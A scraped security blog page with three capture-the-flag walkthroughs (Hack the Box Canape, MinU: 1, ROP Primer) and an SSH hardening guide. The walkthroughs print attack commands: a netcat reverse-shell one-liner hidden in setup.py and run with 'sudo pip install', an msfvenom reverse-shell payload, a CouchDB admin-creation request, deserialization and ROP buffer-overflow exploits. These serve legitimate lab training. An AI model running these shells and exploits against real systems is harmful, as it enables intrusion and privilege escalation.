Hello friends!! Today we are going to solve another CTF challenge “Canape” which is available online for those who want to increase their skill in penetration testing and black box testing. Canape is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online available therefore they have static IP and IP of Canape is 10.10.10.70 so let’s begin with nmap port enumeration.
nmap -p- -sV 10.10.10.70
1
nmap -p- -sV 10.10.10.70
From the given below image, you can observe we found port 80 and 65535 are open on the target system.

As port 80 is running http server, we open the target machine’s IP address in our browser and find that it is a fan site for the Simpsons.

We don’t find anything on the webpage, so we run the dirb scan to enumerate the directories. The target machine responded with 200 OK for every request but for the /.git/Head directory the size of the response changed.
dirb

[To see content please register here]

-f
1
dirb

[To see content please register here]

-f

We open the /.git/ directory and find the config file.

When we open the config file, we find a domain name “git.canape.htb”.

Now we have added the domain name of the target machine in the/etc/hosts file to access the webpage using the IP address as well as a domain name.

Now we can clone the local git repository using the following command:
git clone

[To see content please register here]

1
git clone

[To see content please register here]

Here we found out a file named “__init__.py” in Simpson’s folder as shown in the image.

After downloading the files, we open “__init__.py” and find that this program might be vulnerable insecure deserialization as it uses a vulnerable function “cPickel.loads(data)”.

Now we create a program to exploit this vulnerability and get a reverse shell. You can download the exploit from

[To see content please register here]

.

We set up our listener “netcat” before running the program and run the following command:
nc -lvp 443
1
nc -lvp 443

After getting a reverse shell, we start penetrating more and more. We check for the open ports in the target machine that might be listening locally and find that a service is running on port 5984 for the Apache CouchDB.
netstat -antp
1
netstat -antp

Apache CouchDB is an open source database software. We check the version of CouchDB and also find all the databases using the following command:
curl

[To see content please register here]

curl

[To see content please register here]

1
2
curl

[To see content please register here]

curl

[To see content please register here]

Using the above command, we find the version of CouchDB to be “2.0.0”. This version of CouchDB is vulnerable to remote privilege escalation. You can find more about this vulnerability

[To see content please register here]

.

Then we create a user with permissions to read the database with the following command.
curl -X PUT 'http://localhost:5984/_users/org.couchDB.user:hack' --data-binary  '{ "type": "user", "name": "hack", "roles": ["_admin"], "roles": [], "password": "password" }’
1
curl -X PUT 'http://localhost:5984/_users/org.couchDB.user:hack' --data-binary  '{ "type": "user", "name": "hack", "roles": ["_admin"], "roles": [], "password": "password" }’
We then dump the database with the following command:
curl

[To see content please register here]

-u hack:password
1
curl

[To see content please register here]

-u hack:password
The above command will dump the password and we will find the password for SSH login. Now, all we need to do is find the username.

We open /etc/passwd to find users available on the target machine. We find that there is only one proper user called a homer.
cat /etc/passwd
1
cat /etc/passwd

We login through SSH using the credentials we found earlier “homer:0B4jyA0xtytZi7esBNGp”. After login, we find a file ‘user.txt’. We open the file and find our first flag.
After getting the flag, we checked the sudoers list and find homer has permission to run “pip install *” as the root user.
ssh [email protected] -p65535
ls
cat user.txt
sudo -l
1
2
3
4
ssh [email protected] -p65535
ls
cat user.txt
sudo -l

Now as we know we can run “pip install *” as root, we are going to abuse it by creating a reverse shell and saving it as “setup.py”.
We are going to use netcat pipe one-liner to get a reverse shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

Now we can run our reverse shell using the following command:
sudo pip install .
1
sudo pip install .
Remember to set up the listener before running the above command.

As soon as we run our command, we get our reverse shell as the root user. We now move to /root directory and to get “root.txt”. We take a look at the content of the file and find our final flag.
nc -lvp 4444
id
cd /root
ls
cat root.txt
1
2
3
4
5
nc -lvp 4444
id
cd /root
ls
cat root.txt


Hello Friends! Today we are going to solve another CTF challenge “MinU: 1” This boot2root is an Ubuntu Based virtual machine and has been tested using Virtualbox. The network interface of the virtual machine will take its IP settings from DHCP. Your goal is to capture the flag on /root.
You can download it from here:

[To see content please register here]

Level: Easy/Intermediate
Penetrating Methodology

• Network scanning (Nmap)
  
• Web Directory Enumeration (Dirb)
  
• Found RCE Vulnerability
  
• Digging out JSON Web Token from inside ._pw_
  
• Obtain password by using “c-jwt-cracker” for JSON Web Token
  
• Generate elf payload (msfvenom)
  
• Upload the backdoor inside /tmp
  
• Obtain reverse session (Netcat)
  
• Go for root access
  
• Use environment shell to spawn proper tty shell
  
• Capture the Flag
  

Walkthrough
Since the IP of the target machine is 192.168.1.108, therefore let’s start with nmap aggressive scan.
nmap –A 192.168.1.108
1
nmap –A 192.168.1.108

From the nmap scan result, we found port 80 is open for http service, let’s navigate to port 80 through browser.

Since we found nothing at the home page, therefore next we used dirb for web directory enumeration.
dirb

[To see content please register here]

-X .php
1
dirb

[To see content please register here]

-X .php
With the help of above command, we try to enumerate .php extension files and luckily we found a “test.php” file.

So, when we explored /test.php file in the browser, it welcomes us with the following web page, where we found a hyperlink for the next web page.

Here the web page “Read last visitor data” was vulnerable to remote code execution. As you can observe that in the URL we try to run pwd command. As result, it shown /var/www/html as the current directory.

Next, we had used wafwoof for scanning the type of web application firewall used on the target machine.
wafw00f

[To see content please register here]

1
wafw00f

[To see content please register here]

After we run wafw00f we find that the target machine has implemented modsecurity as web application firewall.

After finding out the WAF, we bypass it by executing following command in the URL.

[To see content please register here]

-a
1

[To see content please register here]

-a

Hence we found out the kernel details of the target machine.
Similarly, we run following command to find out available user directory inside the /home folder.

[To see content please register here]

/home
1

[To see content please register here]

/home

So we found bob could be the name of user directory.
Then we run following command to view the available file and folder inside /home/bob.

[To see content please register here]

-la /home/bob
1

[To see content please register here]

-la /home/bob
Here we found a file”._pw_”

Then we opened the above obtained file with help of cat command and for that we run the following command.

[To see content please register here]

/home/bob/._pw_
1

[To see content please register here]

/home/bob/._pw_
It put up some encoded text in front of us which could be the password but I did not know much about it, what this was, therefore I take help from google and found out that this is a JSON Web Token.

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.
Source:

[To see content please register here]

So I found a tool from the github to crack the JSON web token called c-jwt-cracker.
git clone

[To see content please register here]

cd c-jwt-cracker/
apt-get install libssl-dev
make
1
2
3
4
git clone

[To see content please register here]

cd c-jwt-cracker/
apt-get install libssl-dev
make

Copy the encoded text from the “._pw_” to decrypt it.  Now run the c-jwt-crack tool and paste the encoded string as its argument as shown in the image.
./jwtcrack [paste code here]
1
./jwtcrack [paste code here]
This will give the password: “mlnv1”

Now let’s create a payload using msfvenom with the help of following command:
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.1.106 lport=4444 -f elf > /root/Desktop/shell
1
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.1.106 lport=4444 -f elf > /root/Desktop/shell
Above command will generate the elf payload, now we will transfer this malicious file “shell” to the target with the help of PHP server.
php –S 0.0.0.0:80
1
php –S 0.0.0.0:80

Then download the above malicious file with the help of wget, hence you can run the following command for downloading it into target machine.

[To see content please register here]

1

[To see content please register here]

Now let’s check whether the file is uploaded successfully or not!
Run following command to view the malicious file “shell” file inside the /tmp directory.

[To see content please register here]

/tmp
1

[To see content please register here]

/tmp
Yuppieee!!! In the given below image you can observe that we have successfully uploaded the shell file.

Now give the full permission to the uploaded file “shell” with the help of the following command:

[To see content please register here]

777 /tmp/shell
1

[To see content please register here]

777 /tmp/shell


Let’s verify the given permission with help of the following command:

[To see content please register here]

-la /tmp/shell
1

[To see content please register here]

-la /tmp/shell

Now let’s execute the file “shell” but do not forget to start netcat as the listener.

[To see content please register here]

1

[To see content please register here]

nc –lvp 4444
1
nc –lvp 4444
Hurray!!! We got the reverse shell of the target’s machine and now let’s try to grab the flag.txt file to finish this task. For grabbing the flag.txt file we need the root access and proper tty shell of the machine.
Here we try to use python-one-liner to spawn a tty shell but unfortunately python was not installed on the target machine. So instead we used environment variable to spawn the tty shell.
Now run the following commands to spawn the tty shell and then try to capture flag.txt file.
bash -i
SHELL=/bin/bash script -q /dev/null
su root
1
2
3
bash -i
SHELL=/bin/bash script -q /dev/null
su root
Boooom!!!! We have root access now let’s fetch the flag.txt file.
ls
cat flag.txt
1
2
ls
cat flag.txt


Hello friends! Today we are going to take another CTF challenge known as ROP Primer. The credit for making this VM machine goes to “Bas” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM

[To see content please register here]

.
We have 3 levels available here and we are given the login credentials of all of 3 machines which are as follow:
Levels
Username
Password
Level 0
level0
warmup
Level 1
level1
shodan
Level 2
level2
try harder
We had one binary per level, which we have to exploit each one to successfully extract flags from them.
You can download all the exploit used from

[To see content please register here]

.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.199.139 but you will have to find your own
netdiscover
1
netdiscover

LEVEL 0:
Now we use the given credentials to login through ssh as user level0. After logging in we find 2 files one executable file called level0 and another file called flag. Both files are owned by the level1 user, but the binary file has suid bit set so we can execute it. When we run it we find that it takes a string as input and then outputs a message along with the string.
ssh [email protected]
1
ssh [email protected]

GDB-peda is provided by the author in the lab so we can directly analyze the binary in the target machine itself. Opening the binary in gdb we find that there is a gets function. Now gets is vulnerable to buffer overflow so we try to exploit it.
set disassembly-flavor intel
disas main
1
2
set disassembly-flavor intel
disas main

We created a 500 bytes long pattern using gdb-peda and used it as input for the binary.
pattern create 500
1
pattern create 500

As soon as we passed the string we get a segmentation fault error, we use pattern offset function of gdb-peda to find the EIP offset and find that after 44 bytes we can completely overwrite EIP register.
pattern offset 0x41414641
1
pattern offset 0x41414641

Now we check for security and find that there is no ASLR but NX is enabled so we cannot execute shellcode on the stack.
checksec
1
checksec

As NX is enabled we can still use the ret2libc attack to spawn a shell. But when we try to print the memory address of the system we find that there is no system so we cannot execute /bin/sh to spawn a shell.
In the description, we are given a hint that we can use mprotect to solve this problem.
p system
p mprotect
1
2
p system
p mprotect

When we take a look at the man page for mprotect we find that it used to change the protection of portions of memory by making it readable, writeable and executable. We also find it takes 3 parameters address, length of the memory that needs to be changes and protection level.

As we can make portions of memory readable, writeable and executable, we are going to use the memcpy function to insert our shellcode into the block of memory.
p memcpy
1
p memcpy

Now need to select which section of the memory we are going to change, so we use gdb to see how the memory is mapped.
vmmap
1
vmmap

We are going to take 0x080ca000 as target memory and we are going to mark 4KB of memory starting from 0x080ca000 as readable, writeable and executable. We create an exploit to this for us.

We save the output of this program in a file called input, we are going to use this as our input for the binary file.
python exp.py > input
1
python exp.py > input

When running the binary in gdb with using the input from our exploit, we take a look at the mapped memory and find that the memory block we selected was marked as readable, writeable and executable.
vmmap
1
vmmap

Now we need to remove mprotect’s parameter from the stack so that we can redirect the flow of execution, the mprotect function uses 3 parameters so we need to pop 3 values off the stack so we use ropgadget function in gdb and find a gadget pop3ret at 0x8048882.
ropgadget
1
ropgadget

Now we create the exploit to get an elevated shell. We use cat to keep the shell alive, we run the exploit and now we can access the flag. We take a look at the content of the file and find our first flag.
(python /tmp/exp.py; cat) | ./level0
1
(python /tmp/exp.py; cat) | ./level0

LEVEL 1:
After completing level0, we log in as level1 using the given credentials. We find a file called flag, blah and a binary file called level1 with suid bit set. When we run the binary it says that error binding.
ssh [email protected]
1
ssh [email protected]

We check the listening ports on the target machine and find that port 8888 is open. We check processes with uid 1002 and find it is level1.
netstat -aepn | grep 8888
ps -aux | grep 1002
1
2
netstat -aepn | grep 8888
ps -aux | grep 1002

We connect it and find it is an application that can be used to store and read files.
nc 192.168.199.139 8888
1
nc 192.168.199.139 8888

We open the binary in gdb and take a look at the assembly code for further analysis.
gdb -q level1
set disassembly-flavor intel
disas main
1
2
3
gdb -q level1
set disassembly-flavor intel
disas main

We set up a breakpoint on the main function. At main+115 we found that port 8888 is stored on the stack. We changed the value stored in the memory address to port 8889 so that we can run the program.
set {int}0xbffff6b0 = 8889
1
set {int}0xbffff6b0 = 8889

We create a 128 bytes long pattern using pattern_create.rb script in our system. So that we can pass the string as the name of the file.
./pattern_create -l 128
1
./pattern_create -l 128

After changing the port number, we connected to it and stored a file with 128-byte size.
After mentioning the size of the file, it asks for the file name. We passed the 128 bytes long pattern as the file name.
nc 192.168.199.139 8889
1
nc 192.168.199.139 8889

When we switch to gdb we find that we get a segmentation fault.

We now use patten_offset.rb script to find the EIP offset.
./pattern_offset.rb -q 0x63413163
1
./pattern_offset.rb -q 0x63413163

We are given a hint in the description of this challenge that we can use read, write and open function to open the flag and read it.
p read
p write
p open
1
2
3
p read
p write
p open

We are now going to need ropgadget, we need pop2ret for a gadget for open function and pop3ret gadget for reading function.
ropgadget
1
ropgadget

Now if we can get the address of the ‘flag’ string, then we can just read the flag and output it to the connected socket.
find flag
1
find flag

We create an exploit to get the flag. We run it and find the flag.
python level1.py
1
python level1.py

LEVEL 2:
After completing level1, we log in as level2 using the given credentials. We find a file called flag and a binary file called level2 with suid bit set. When we run the binary, we find that it takes a string as an argument and then prints it.
ssh [email protected]
1
ssh [email protected]

We open the file in gdb for further analysis and find that at main+46 it calls the strcpy function. As the strcpy function is vulnerable to buffer overflow we exploit it.
gdb -q level2
set disassembly-flavor intel
disas main
1
2
3
gdb -q level2
set disassembly-flavor intel
disas main

On further analysis we find that it is similar to level0 binary file, we create a 500 bytes string and pass its argument and find the EIP offset to be 44 bytes.
pattern offset 0x41414641
1
pattern offset 0x41414641

This binary file has a strcpy function instead of gets we cannot use “\x00”. So we use gadgets to do our work. We use ropshell.com to find all the gadgets used in this exploit.

We modified the exploit we created for level0 and inserted our gadgets. We use read function instead of the memcpy function in this exploit. (Gadgets are explained in the exploit code).
As soon as we run our exploit we spawn a shell as the root user. We open the flag file and get our final flag.


Secure Shell (SSH) is defined as a network protocol to operate network services securely over an unsecured network. The standard TCP port for SSH is 22. The best application of SSH is to remotely login into computer systems by users.
This article will be explaining about the network securities which help the network administrator to secure the service of SSH on any server through multiple ways.
Methods Used:

1. Port Forwarding
   
2. Disable Password-Based Login And Using PGP Key (Public Key)
   
3. Disable Root Login and Limit SSH User’s Access
   
4. Google Authenticator
   
5. Time Scheduling
   
6. Disable Empty Passwords
   

Before moving on, Let us first install an SSH server on our client machine using the following command.
sudo apt-get install openssh-server
1
sudo apt-get install openssh-server

Port Redirection
Once the SSH services are configured and running, we can begin with our first security measure which is Port Forwarding. Upon initiating the scan on the client’s machine IP address using nmap, it shows that SSH is running on Port 22.

Navigate to /etc/ssh and we will find a file named sshd_config in the client’s machine.
cd /etc/ssh
1
cd /etc/ssh

Open the file sshd_config using nano command.

Now change the port 22 to port 2222 as shown in the below screenshot and save the changes made in the sshd_config file. Hence, in this way we have forwarded the port from 22 to 2222.

Now to confirm port forwarding, we will again scan the Client’s IP address using nmap
nmap 192.168.1.104
1
nmap 192.168.1.104
The output of the nmap shows that TCP port 2222 is opened; however, shows EthernetIP-1 in the service description which doesn’t give an exact description of the service running. So we will run the following nmap command with version detection option
nmap -sV 192.168.1.104
1
nmap -sV 192.168.1.104
With the next output of nmap, it is clearly visible that SSH services are running on TCP Port 2222 along with the description of the OpenSSH version.

Secure With Public Key
To begin with this security measure we need to download and install PuTTY Key Generator.
Note: PuTTYgen is a key generator tool for creating SSH keys for PuTTY and stores keys in its own format ( .ppk extension)
Open it and Click on Generate.

Clicking on Generate will initiate the process of generating a Public and Private Key, as shown in the image.

Once Public and Private Key are generated, click on Save Private Key. This will save the key as a Public Key.

Now open the Ubuntu terminal of our server and type ssh-keygen.

The above command will create a folder named .ssh and then create an empty text file with the name authorized_keys in the same folder. After that copy the “ssh_login.ppk” file which was created using PuTTy Key Generator previously and paste it into the .ssh folder as shown in the image.

In the terminal, move into the .ssh folder and type the following command:
puttygen -L "ssh_login.ppk"
1
puttygen -L "ssh_login.ppk"
This command will open the key.

Now copy this key and paste it in the empty file named authorized_keys using nano command and save it.

Now open the putty configuration tab, then go to Session tab and give the IP Address & Port Number of your Clients Machine were ssh server is configured.

Now go to data and give Auto-login username.

Navigate to SSH>Auth and give the path of the ssh_login.ppk file (the public key that was generated earlier) and then click Open.

It will simply use the public key to Login into SSH Server without asking for Password.

Open the sshd_config file in /etc/ssh using gedit command. Here we will make changes in line #PasswordAuthentication as shown in the image.
Current configuration
#PasswordAuthentication yes

Now we will edit parameter value yes to no and remove the # (hash) as shown in the below image. Once done save the changes made. These changes will disable any user to log into SSH Server using the password.
PasswordAuthentication no

As you can see these settings have disabled password based login and is indeed asking for a Public Key to log in.

Disable Root Login and Limit SSH User’s Access
To begin with, this security measure you need to make some new User’s using adduser command (New User’s We have Created: h1,h2,h3,h4) then make changes in the sshd_config file in /etc/ssh using gedit command. Type the Following Lines under #Authentication:
#No root login allowed (h2 can log in as sudo –s)
PermitRootLogin no
## only allow 1 users h2 (sysadmin)
AllowUsers h2
Remember to save the changes made. This will disable Root Login and will allow the only h2 user to log into ssh server remotely.

As you can see the only h2 user is able to successfully log into SSH Server, where h1 and h3 users permission to log into SSH Server is denied.

Google Authenticator
To begin with the two-factor authentication over SSH Server, you need to download the google authenticator application on your phone and also install the required dependency package for Ubuntu using the following command:
sudo apt-get install libpam-google-authenticator
1
sudo apt-get install libpam-google-authenticator
NOTE-The installation of google authenticator will as ask a couple of questions give Yes for every question asked.

After the installation is completed. Open terminal and type command:
google-authenticator
1
google-authenticator
We will see a barcode. Scan it using the google authenticator application on your phone.

Once the application has scanned the barcode, it will start generating One Time Password’s as shown in the image.

Now open sshd file in /etc/pam.d using gedit command and make the following changes:

1. Add # to @include common-auth
   
2. Add Line (auth required pam_google_authenticator.so) under @include common-password
   

As shown in the image.

Now open the sshd_config file in /etc/ssh using gedit command and make the following changes.
ChallengeResponseAuthentication yes

When we log into SSH Server it will prompt for a verification code, Here we have to enter the One Time Password generated on our google authenticator application. As you can see we have successfully logged into SSH Server using One Time Password.

Time Scheduling
In this security measure, we are going to set the time limit on SSH service on the server.
Cron is a built-in service of Linux to schedule task, which enables a job (command or script) on the server to run automatically over specified time and date.
Here we are going to schedule SSH services using crontab
We had open crontab in /etc using nano command. Now lets schedule ssh service in a way that it will start for every 2nd minute and will get stop after every 4th minute. The command used to schedule the SSH Service are given below:
*/2 * * * * root service ssh start
*/4 * * * * root service ssh stop
1
2
*/2 * * * * root service ssh start
*/4 * * * * root service ssh stop
Save the changes made in the file.

Wait for service to reboot. Using nmap we have scan port 22.
nmap -p 22 192.168.1.104
1
nmap -p 22 192.168.1.104
After running the scan, we will observe that ssh service on port 22 is CLOSED because it is the 4th minute which has started.
Now if our command is working properly it should start itself on every 2nd minute, to confirm it we will again initiate a scan using nmap.
nmap –p 22 192.168.1.104
1
nmap –p 22 192.168.1.104
As we can see that the port is in the OPEN state now.

Disable Empty Password
In this security measure, as a best practice; one should always disable empty password login to the SSH Server. To enable this setting we need to open the sshd_config file using gedit command and make the following changes:
PermitEmptyPasswords No
These changes will simply disable empty password login’s into SSH Server.